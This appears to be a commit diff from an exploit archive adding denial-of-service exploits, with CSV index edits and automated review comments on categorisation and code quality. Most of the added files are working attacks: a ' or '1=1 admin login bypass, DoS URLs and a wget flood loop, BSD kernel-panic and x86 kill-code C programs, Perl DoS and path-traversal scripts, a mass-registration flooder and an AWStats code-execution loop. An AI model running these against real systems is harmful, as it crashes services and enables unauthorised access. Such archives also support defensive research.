DB: 2015-08-14

191 new exploits
Offensive Security, 2015-08-14 05:02:47 +00:00
parent a732415255
commit 9569f264ec
195 changed files with 14708 additions and 787 deletions


@ -1418,7 +1418,7 @@ id,file,description,date,author,platform,type,port
1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0
1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0
1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0
1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure & Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion Vulnerability",2006-04-19,"GroundZero Security",php,webapps,0
1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0
1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0
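Review bot: the two 1698 rows in the middle of this hunk are the removed and added versions of a single entry (the +/- prefixes were lost in rendering), and the only change is "&" becoming "/" in "Path Disclosure / Denial of Service Exploit". A one-line rationale in the commit message (for instance that "&" is being normalised out of descriptions) would make this kind of cosmetic edit auditable across the 195 changed files instead of leaving reviewers to spot the single changed character.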
@ -16982,7 +16982,7 @@ id,file,description,date,author,platform,type,port
19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0
19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,metasploit,windows,remote,3460
19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (2)",1999-11-07,"dark spyrit",windows,remote,0
19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0
19615,platforms/unix/dos/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,dos,0
19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0
19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow Vulnerability",1999-11-11,"Ussr Labs",windows,remote,0
19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message Vulnerability",1999-11-14,"Georgi Guninski",windows,remote,0
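Review bot: the 19615 entry is recategorised from platforms/unix/remote to platforms/unix/dos with the type column changed to match, but the description is edited in the same row ("NXT Overflow & Denial of Service" becomes "NXT Overflow and Denial of Service"); mixing a reclassification with a wording change makes the diff harder to review, and the description still advertises an overflow, so "dos" covers only half of what the advisory title claims. The path column now points at 19615.c under dos/, so the file move has to land with this row or the index dangles.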
@ -17659,7 +17659,7 @@ id,file,description,date,author,platform,type,port
20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service Vulnerability",2000-10-20,"Knud Erik Højgaard",hardware,dos,0
20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab /tmp File Vulnerability",2000-10-20,"Kyong-won Cho",hp-ux,local,0
20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL Remote Arbitrary Command Execution Vulnerability",2000-10-26,blackangels,hardware,remote,0
20331,platforms/hardware/remote/20331.c,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0
20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,dos,0
20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (2)",1998-03-17,Rootshell,hardware,dos,0
20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Vulnerability",1997-07-21,"D. J. Bernstein",unix,local,0
20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x Brute-Force Vulnerability",2000-10-29,Craig,windows,remote,0
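Review bot: moving 20331 from hardware/remote to hardware/dos brings it in line with its sibling 20332, the "(2)" variant of the same Ascend denial of service, which was already under dos. The description is left untouched here, which is the cleaner pattern compared with the other hunks in this index that edit text and category in one row.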
@ -29438,7 +29438,7 @@ id,file,description,date,author,platform,type,port
32654,platforms/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass Weakness",2008-12-11,"Rafel Ivgi",windows,remote,0
32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products 'logon_processing.jsp' SQL Injection Vulnerabilities",2008-12-11,"3d D3v!L",jsp,webapps,0
32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0
32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0
32657,platforms/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,dos,0
32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0
32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service Vulnerability",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0
32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0
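Review bot: 32657 is moved from windows/remote to windows/dos, consistent with its "Remote Denial of Service" title. Unrelated to this change but visible in the context lines: the 32763 row ("Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service", dated 2009) sits between 32657 and 32660, so the id ordering of the index is already broken in this region; worth a follow-up, since any tooling that assumes sorted ids will mis-merge here.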
@ -34074,4 +34074,6 @@ id,file,description,date,author,platform,type,port
37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37762,platforms/lin_x86/shellcode/37762.py,"Linux x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
37764,platforms/windows/dos/37764.html,"Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0
37768,platforms/windows/local/37768.txt,"Windows 8.1 DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,windows,local,0
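Review bot: only two appended rows (37764 and 37768) are visible for a commit titled "191 new exploits", because the rendered view truncates the index ("Can't render this file because it is too large"), so anyone reviewing this commit from the web UI needs to diff the CSV locally. Of the two rows shown, both keep port 0, matching the neighbouring dos and local entries, and the MS15-079 and MS15-076 bulletin ids in their descriptions are the only fix references anywhere in this hunk; the index is the natural place for such pointers, so the other new entries in this commit would benefit from the same treatment.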

Can't render this file because it is too large.

platforms/asp/dos/12527.txt (executable file, 49 lines added)

@ -0,0 +1,49 @@
************************************************************
** Administrador de Contenidos Admin Login Bypass vulnerability
************************************************************
** Prodcut: Administrador de Contenidos
** Home : www.DZ4All.cOm/Cc
** Vunlerability : Admin Bypass
** Risk : High
** Dork : "Diseño Web Hernest Consulting S.L."
************************************************************
** Discovred by: Ra3cH
** From : Algeria
** Contact : e51@hotmail.fr
** *********************************************************
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen
************************************************************
** Exploit:
** http://[PATH]/admin or http://[PATH]/admin/Login.Asp
**
** user : ' or '1=1
** password : ' or '1=1
**
************************************************************
************************************************************
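Review bot: this file is stored under platforms/asp/dos/ but its content is an admin login bypass (the "Vunlerability : Admin Bypass" line and the ' or '1=1 credentials), that is, an authentication bypass in a web application with no denial-of-service component; it belongs under webapps, and the type column for 12527 in the index should be checked to match. The header also misspells several metadata fields ("Prodcut", "Vunlerability", "Discovred"), which hurts searches over the archive, and it names neither the root cause (unsanitised credentials reaching the login query) nor an affected version, so a defender cannot map it to a fix.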

platforms/asp/dos/27258.txt (executable file, 17 lines added)

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/16771/info
Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests.
This issue allows remote attackers to consume excessive CPU resources on targeted computers, denying service to legitimate users.
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=
An example script to exploit this issue is also available:
while [ 1 ]
do
wget -O /dev/null http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=
done
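Review bot: the entry gives no version range beyond "WhatsUp Professional 2006" and no fix reference, and the four URLs differ only in parameter order, so the advisory never identifies which parameter actually triggers the CPU exhaustion. For a defender writing a detection or rate-limit rule, the stable fingerprint across all variants is a request to /NmConsole/Login.asp with bIsJavaScriptDisabled=true and empty sLoginUserName and sLoginPassword values, repeated in a tight loop as the sample script shows.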

platforms/asp/dos/35154.txt (executable file, 7 lines added)

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45588/info
Sigma Portal is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
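Review bot: "Sigma Portal is prone to a denial-of-service vulnerability" names no affected version, and the single URL carries a "(Picture ID)" placeholder plus oversized Width and Height values with a stray %27 in Width, so it is unclear whether the trigger is the quote character, the dimension size, or both; without that the entry cannot be mapped to a fix. For detection, the identifiable part is a request to /Portal/Picture/ShowObjectPicture.aspx whose Width or Height values are far outside any real image dimension.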

platforms/bsd/dos/19488.c (executable file, 38 lines added)

@ -0,0 +1,38 @@
source: http://www.securityfocus.com/bid/622/info
A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding.
Details behind why this happens have not been made available.
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}
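Review bot: the prose at the top of this .c file (the source line and two paragraphs) is not inside a comment, so as stored the file is not a valid translation unit; the same applies to the other securityfocus-sourced C files in this commit (21077.c, 19505.c, 19441.c, 19919.c), so a consistent fix would be to wrap the imported description in a /* */ block across the batch. In the code, the four setsockopt calls and the two write calls discard their return values and the char buffer crap is written uninitialised; none of that changes the reported effect, but it means the program never reports whether the kernel accepted the 204800-byte SO_SNDBUF and SO_RCVBUF values, which is exactly the detail the advisory admits is unexplained ("Details behind why this happens have not been made available"). exit is also used without <stdlib.h>.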

platforms/bsd/dos/21077.c (executable file, 31 lines added)

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/3220/info
It has been reported that there is a locally exploitable vulnerability in BSDI.
It is allegedly possible for a userland process to cause the kernel to halt.
This may be due to a bad system call.
/* (BSDi)*[v3.0/3.1] system failure, by
v9[v9@realhalo.org]. this will result
in the ability of any user to fail the
system, and reboot it. this bug is
similar to that of the "f00f" bug.
results are similar, except this reboots
the machine instead of having a freezing
effect. tested, and built for: BSDi
v3.0/3.1. (arch/non-specific to BSDi)
*/
char bsdi_killcode[] =
"\xb8\x8f\xf8\xff\x0b\xf7\xd0\x50\xb0\x0b"
"\xb0\x9a\x50\x89\xe7\xff\xd7";
int main() {
void (*execcode)()=(void *)bsdi_killcode;
printf("[ (BSDi)*[v3.0/3.1]: system failu"
"re, by: v9[v9@realhalo.org]. ]\n");
printf("*** no output should be seen afte"
"r this point.\n");
execcode();
printf("*** system failure failed.\n");
exit(0);
}
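Review bot: the header says "(arch/non-specific to BSDi)" but bsdi_killcode is a raw x86 byte string executed by casting a data array to a function pointer, so the test applies only to x86 BSDi builds whose data segment is executable; the comment should say so, since on any platform that enforces non-executable data the program faults at execcode() rather than reaching the kernel. printf and exit are used without <stdio.h> and <stdlib.h>, and the advisory text itself ("may be due to a bad system call") leaves the root cause unconfirmed, so the entry has no fix pointer beyond "v3.0/3.1".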

platforms/cgi/dos/1157.pl (executable file, 54 lines added)

@ -0,0 +1,54 @@
#!/usr/bin/perl
use LWP::Simple;
if (@ARGV < 3)
{
print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n";
print "sever - URL chat\n";
print "path - path to chat.pl\n";
print "mode - poc or dos,\n";
print " poc - simple check without DoS and exit,\n";
print " dos - DoS, you must set count for requests in 4 argument.\n\n";
exit ();
}
$DoS = "dos";
$POC = "poc";
$server = $ARGV[0];
$path = $ARGV[1];
$mode = $ARGV[2];
$count = $ARGV[3];
print qq(
###################################
# GTChat <= 0.95 Alpha remote DoS #
# tested on GTChat 0.95 Alpha #
# (c)oded by x97Rang 2005 RST/GHC #
# Respect: b1f, 1dt.w0lf, ed #
################################### );
if ($mode eq $POC)
{
print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n";
$URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
$content = get "$URL";
if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/)
{ print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); }
if ($content =~ /Fatal error/)
{
print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n";
print "=== OUTPUT ===============================================================================\n";
print "\n$content\n";
print "=============================================================================== OUTPUT ===\n";
exit();
}
else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)\n"; }
}
if ($mode eq $DoS)
{
if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() }
print "\nSend $count DoS requests to $server...\n";
$URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }
print "Done, packets sended.\n";
}
# milw0rm.com [2005-08-18]
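Review bot: the header block never names the bug both modes rely on: the URLs built in the poc and dos branches pass a language parameter containing ../ sequences terminated by %00, that is, a null-byte-truncated path traversal in chat.pl, and the dos mode simply repeats that request $count times. A one-line statement of the bug class and the affected version ("GTChat <= 0.95 Alpha" appears only in the banner) would make the entry usable for triage, and for detection the distinguishing token is a %00 inside the language parameter of chat.pl. Minor: the usage text reads "sever" for "server", and $count is validated only in dos mode.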

platforms/cgi/dos/1175.pl (executable file, 46 lines added)

@ -0,0 +1,46 @@
# Use a high user # for best results. /str0ke
#!/usr/bin/perl
######################
# codez0red by VTECin5th #
# Feel free to modify/break this script #
# Crappy code is more effective =] #
# I accept no responsibility for misuse or abuse #
######################
# Usage: xxx.pl www.server.com /directory_to_chat/ #_of_users_to_create
######################
# Affected Software: GTChat .95
# Unaffected Software: GTChat .93
######################
use IO::Socket;
if (@ARGV < 2){
print "Usage:\n xxx.pl www.server.com /Path_to_GTChat/ #_of_users_to_create\n";
print "Example:\n xxx.pl www.serfer.com /GTChat/cgi-bin/ 5";
exit;
}
$dir = $ARGV[1];
$numero = $ARGV[2];
$host = $ARGV[0];
$host =~ s/http\:\/\///gi;
for ($i = 1; $i <= $numero; $i++) {
$rando = int(rand(234));
$randy = int(rand(12));
$whyThem = $randy . $rando . "@" . $randy . ".com";
$whyMe = "SoSorry" . $rando . $randy;
$lol = "$dir/chat.pl?action=register&name=$whyMe&password=$whyMe&password2=$whyMe&email=$whyThem&privateemail=0";
$ox=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp') || die "Oh No! You broke teh server!";
print $ox "GET $lol HTTP/1.1\r\n";
print $ox "Accept: */*\r\n";
print $ox "Accept-Language: pt\r\n";
print $ox "Accept-Encoding: gzip, deflate\r\n";
print $ox "User-Agent: 1337 pwnz0r\r\n";
print $ox "Host: $host\r\n";
print $ox "Connection: Keep-Alive\r\n\r\n\r\n";
print "currently on: $whyMe \t ($i)\n";
# Please note, this does not verify whether or not the user is actually being created.
# I assume you know how to use this script.
}
print "Finished creating $numero users";
close($ox);
# milw0rm.com [2005-08-23]
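Review bot: the argument check tests @ARGV < 2 while the usage line and the loop require three arguments (host, path, number of users), so a missing third argument passes the check, $numero is undefined, the loop runs zero times and "Finished creating  users" is printed with an empty count; the check should be @ARGV < 3. From the defender's side, the effect described (mass registration through chat.pl?action=register with generated names like SoSorry<n> and throw-away <n>@<n>.com addresses) is exactly the pattern a registration rate limit or CAPTCHA addresses, and the fixed User-Agent "1337 pwnz0r" together with Accept-Language: pt makes this particular script trivial to spot in access logs.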

platforms/cgi/dos/20400.txt (executable file, 8 lines added)

@ -0,0 +1,8 @@
source : http://www.securityfocus.com/bid/1934/info
Cart32 is a shopping cart application for e-commerce enabled sites.
Cart32 is subject to a denial of service. When requesting a specially formed URL the application will cause the CPU utilization to spike to 100%. A restart of the application is required in order to gain normal functionality.
http://target/cgi-bin/c32web.exe/ShowProgress
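Review bot: the entry has no version information ("Cart32 is a shopping cart application") and the trigger is a bare path, /cgi-bin/c32web.exe/ShowProgress, with no parameters, so nothing distinguishes a malicious request from a legitimate one except repetition. The only defensive handle here is the stated impact (CPU pinned at 100% until the application is restarted), which argues for process-level CPU limits and monitoring on the c32web.exe host rather than a request signature.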

platforms/cgi/dos/20753.txt (executable file, 9 lines added)

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/2588/info
Net.Commerce is part of the Websphere platform of products distributed by IBM. Net.Commerce provides several versatile features to facilitate e-commerce, and features in performance and reliability.
A problem in the Net.Commerce package could allow a remote user to deny service to legitimate users of the service hosted by the Websphere server. This is due to the handling of long strings by the macro.d2w cgi included with a Net.Commerce installation. By supplying a long string of "%0a" characters to the CGI, the Websphere server ceases operation.
A remote user may use this vulnerability to crash the Websphere server, thus denying service to legitimate users.
http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a
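Review bot: the trigger length is given only as "(aprox 1000)" %0a sequences, so the minimum string that crashes macro.d2w is unknown, and neither a Net.Commerce version nor a fix is named. For defenders the actionable item is that the path /cgi-bin/ncommerce3/ExecMacro/macro.d2w followed by a long run of encoded newlines is a clear signature, and a request-path length limit at the front end would cut it off well below the stated length.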

platforms/cgi/dos/24619.txt (executable file, 9 lines added)

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/11226/info
Reportedly EmuLive Server4 is affected by an authentication bypass vulnerability and a denial of service vulnerability. These issues are due to an access validation issue and a failure to handle exceptional conditions.
An attacker may leverage the authentication bypass issue to gain unauthorized access to the administrator scripts of the affected application, facilitating manipulation of various server settings. The denial of service issue may be exploited to cause the affected computer to freeze, denying service to legitimate users.
http://www.example.com//PUBLIC/ADMIN/INDEX.HTM
Note that the '//' after the 'http://www.example.com' is where a session ID would be presented, by providing no data between these slashes a NULL session ID is used to authenticate the attacker.
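Review bot: the file is filed under cgi/dos but the only request shown demonstrates the authentication bypass (the empty session-ID segment in http://www.example.com//PUBLIC/ADMIN/INDEX.HTM), not the denial of service; the DoS is described only as "a failure to handle exceptional conditions" with no trigger, so the entry should either be categorised as an authentication bypass or include the DoS request. The closing note that "//" is treated as a NULL session ID is the useful part for defenders: any request whose session-ID path segment is empty should be rejected before the ADMIN scripts are reached.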

platforms/cgi/dos/3223.pl (executable file, 65 lines added)

@ -0,0 +1,65 @@
##
## cvstrack-resurrect.pl -- CVSTrac Post-Attack Database Resurrection
## Copyright (c) 2007 Ralf S. Engelschall <rse@engelschall.com>
##
use DBI; # requires OpenPKG perl-dbi
use DBD::SQLite; # requires OpenPKG perl-dbi, perl-dbi::with_dbd_sqlite=yes
use DBIx::Simple; # requires OpenPKG perl-dbix
use Date::Format; # requires OpenPKG perl-time
my $db_file = $ARGV[0];
my $db = DBIx::Simple->connect(
"dbi:SQLite:dbname=$db_file", "", "",
{ RaiseError => 0, AutoCommit => 0 }
);
my $eow = q{\x00\s.,:;?!)"'};
sub fixup {
my ($data) = @_;
if ($$data =~ m:/[^$eow]*/[^$eow]*'[^$eow]+:s) {
$$data =~ s:(/[^$eow]*/[^$eow]*)('[^$eow]+):$1 $2:sg;
return 1;
}
return 0;
}
foreach my $rec ($db->query("SELECT name, invtime, text FROM wiki")->hashes()) {
if (&fixup(\$rec->{"text"})) {
printf("++ adjusting Wiki page \"%s\" as of %s\n",
$rec->{"name"}, time2str("%Y-%m-%d %H:%M:%S", -$rec->{"invtime"}));
$db->query("UPDATE wiki SET text = ? WHERE name = ? AND invtime = ?",
$rec->{"text"}, $rec->{"name"}, $rec->{"invtime"});
}
}
foreach my $rec ($db->query("SELECT tn, description, remarks FROM ticket")->hashes()) {
if (&fixup(\$rec->{"description"}) or &fixup(\$rec->{"remarks"})) {
printf("++ adjusting ticket #%d\n",
$rec->{"tn"});
$db->query("UPDATE ticket SET description = ?, remarks = ? WHERE tn = ?",
$rec->{"description"}, $rec->{"remarks"}, $rec->{"tn"});
}
}
foreach my $rec ($db->query("SELECT tn, chngtime, oldval, newval FROM tktchng")->hashes()) {
if (&fixup(\$rec->{"oldval"}) or &fixup(\$rec->{"newval"})) {
printf("++ adjusting ticket [%d] change as of %s\n",
$rec->{"tn"}, time2str("%Y-%m-%d %H:%M:%S", $rec->{"chngtime"}));
$db->query("UPDATE tktchng SET oldval = ?, newval = ? WHERE tn = ? AND chngtime = ?",
$rec->{"oldval"}, $rec->{"newval"}, $rec->{"tn"}, $rec->{"chngtime"});
}
}
foreach my $rec ($db->query("SELECT cn, message FROM chng")->hashes()) {
if (&fixup(\$rec->{"message"})) {
printf("++ adjusting change [%d]\n",
$rec->{"cn"});
$db->query("UPDATE chng SET message = ? WHERE cn = ?",
$rec->{"message"}, $rec->{"cn"});
}
}
$db->commit();
$db->disconnect();
# milw0rm.com [2007-01-29]
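Review bot: this is a repair tool, not an exploit: cvstrack-resurrect.pl rewrites wiki, ticket, tktchng and chng rows in a CVSTrac SQLite database to undo damage after an attack, so storing it under platforms/cgi/dos/ is a miscategorisation. As a repair script it connects with RaiseError => 0 and AutoCommit => 0, which means a failing UPDATE is silently skipped while $db->commit() still runs at the end; RaiseError => 1 would abort the transaction on the first error and leave the database untouched. fixup() also modifies the record text in place before each UPDATE, so a dry-run flag that prints the "++ adjusting" lines without writing would be worth having on data that is by definition already damaged.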

platforms/cgi/dos/817.pl (executable file, 44 lines added)

@ -0,0 +1,44 @@
#!/usr/bin/perl
#
#
# Summarized the advisory www.ghc.ru GHC: /str0ke
#
# [0] Exploitable example (raw log plugin):
# Attacker can read sensitive information
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog
#
# [1] Perl code execution. (This script)
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
#
# [2] Arbitrary plugin including.
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
#
# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).
# Every user can access debug function:
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
#
# Be sure to change the $server + /cgi-bin location /str0ke
#
use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "\n\n";
}
while () {
$rp = rand;
&ConnectServer;
}
# milw0rm.com [2005-02-14]
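Review bot: the header lists four distinct AWStats issues ([0] raw-log read, [1] Perl code execution via PluginMode, [2] arbitrary plugin inclusion, [3] debug information leak) but the script exercises only [1], sending PluginMode=:sleep in an endless while () loop; the entry should be titled and classified for what the code does, and the version range "6.3(Stable) - 6.4(Development)" from item [3] is the only affected-version statement, so it belongs at the top of the header. ConnectServer never reads a response or closes $socket explicitly, relying on reassignment to release the previous handle. For detection, the common fingerprint across all four URLs is a request to awstats.pl whose PluginMode or loadplugin value starts with ":" or contains "../".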

platforms/freebsd/dos/19505.c (executable file, 58 lines added)

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/653/info
A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wired memory thus creating a denial of service condition. The new VFS cache has no way to purge entries from memory while the file is open, consuming wired memory and allowing for the denial of service (memory that cannot be swapped out).
FreeBSD versions earlier than 3.0 are not vulnerable, nor is the original 4.4BSD-Lite code.
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#define NFILE 64
#define NLINK 30000
#define NCHAR 245
int
main()
{
char junk[NCHAR+1],
dir[2+1+2+1], file1[2+1+2+1+NCHAR+3+1], file2[2+1+2+1+NCHAR+3+1];
int i, j;
struct stat sb;
memset(junk, 'x', NCHAR);
junk[NCHAR] = '\0';
for (i = 0; i < NFILE; i++) {
printf("\r%02d/%05d...", i, 0),
fflush(stdout);
sprintf(dir, "%02d-%02d", i, 0);
if (mkdir(dir, 0755) < 0)
fprintf(stderr, "mkdir(%s) failed\n", dir),
exit(1);
sprintf(file1, "%s/%s%03d", dir, junk, 0);
if (creat(file1, 0644) < 0)
fprintf(stderr, "creat(%s) failed\n", file1),
exit(1);
if (stat(file1, &sb) < 0)
fprintf(stderr, "stat(%s) failed\n", file1),
exit(1);
for (j = 1; j < NLINK; j++) {
if ((j % 1000) == 0) {
printf("\r%02d/%05d...", i, j),
fflush(stdout);
sprintf(dir, "%02d-%02d", i, j/1000);
if (mkdir(dir, 0755) < 0)
fprintf(stderr, "mkdir(%s) failed\n", dir),
exit(1);
}
sprintf(file2, "%s/%s%03d", dir, junk, j%1000);
if (link(file1, file2) < 0)
fprintf(stderr, "link(%s,%s) failed\n", file1, file2),
exit(1);
if (stat(file2, &sb) < 0)
fprintf(stderr, "stat(%s) failed\n", file2),
exit(1);
}
}
printf("\rfinished successfully\n");
}
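Review bot: memset, exit and creat are used without <string.h>, <stdlib.h> and <fcntl.h>, and the error paths rely on the comma operator ("fprintf(stderr, ...), exit(1);" under an if without braces), which is legal but easy to misread as two statements; a brace block would be clearer. The advisory is specific about scope ("FreeBSD versions earlier than 3.0 are not vulnerable, nor is the original 4.4BSD-Lite code"), which is worth carrying into the index description where there is room for a version. Note also that the program leaves up to NFILE*NLINK hard links and their directories on disk with no cleanup, so a test run consumes inodes and namespace on the test host regardless of whether the kernel is affected.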

platforms/hardware/dos/19441.c (executable file, 245 lines added)

@ -0,0 +1,245 @@
source: http://www.securityfocus.com/bid/556/info
